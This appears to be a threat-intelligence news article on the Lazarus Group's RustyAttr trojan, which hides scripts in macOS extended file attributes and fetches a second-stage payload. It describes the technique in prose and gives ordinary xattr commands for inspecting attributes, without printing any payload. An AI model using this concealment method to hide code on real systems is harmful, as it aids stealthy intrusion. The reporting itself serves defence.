The Lazarus Group is exploiting the xattr command in Unix-like systems to stealthily embed malicious data within system files, which is dubbed Rustyattr, and leverages extended file attributes to hide data without modifying the file’s visible content.Â
The threat actors are able to circumvent conventional detection methods and establish a foothold on compromised systems that is long-lasting when they do this.
This innovative approach, currently unrecognized by the MITRE ATT&CK Framework, highlights the evolving tactics of advanced threat groups and underscores the need for enhanced security measures to counter such sophisticated attacks.
xattr, or extended attributes, is a feature that allows users to store additional metadata on files in Unix-like systems, which is separate from standard file attributes like size and modification time.
It can be used to store custom tags, system-specific information, or even binary data. On macOS, xattr is used for various purposes, including storing Finder tags, quarantine flags, and Spotlight metadata.Â
While beneficial for system functionality, it can also be exploited by attackers to hide malicious data within files. By leveraging xattr, users can create files with hidden information that is not visible through standard file inspection methods.
The `xattr` command is used to manage extended attributes on files, and to list all extended attributes on a file named `secretfile.txt`, they can execute `xattr secretfile.txt`.
To view the specific content of a hidden attribute named `com.example.hidden_data` on a file named `secret.txt`, they can use `xattr -l secret.txt`, and to remove this attribute, they can run `xattr -d com.example.hidden_data secret.txt`.
Researchers at Denwp discovered that the Lazarus Group is using extended attributes (xattr) to hide malicious code on macOS systems and developed a Trojan named RustyAttr written in Rust and built with the Tauri framework.Â
The trojan hides malicious code within custom xattrs of application files. By using the `xattr` command with the `-r` flag, additional attributes can be discovered.
The `-p` flag reveals the data stored within a specific attribute, as in this case, the attribute “test” contained a malicious script that downloaded a PDF, opened it, and then fetched and executed a second-stage payload from a remote server.
Lazarus Group employed social engineering to distribute the RustyAttr trojan, a stealthy malware capable of executing malicious scripts from hidden file attributes. The trojan, initially signed with a revoked certificate, bypassed macOS security measures and fetched payloads from malicious domains linked to known threat actor infrastructure.Â
xattr, similar to Windows Alternate Data Streams, enables attackers to conceal critical data and payloads within file metadata, which is employed by groups like Lazarus and allows for persistent system control by evading traditional security solutions.
The lack of documentation in the MITRE ATT&CK Framework highlights the significance of this threat. To counter this, organizations must prioritize monitoring and securing extended file attributes to proactively identify and mitigate such attacks.
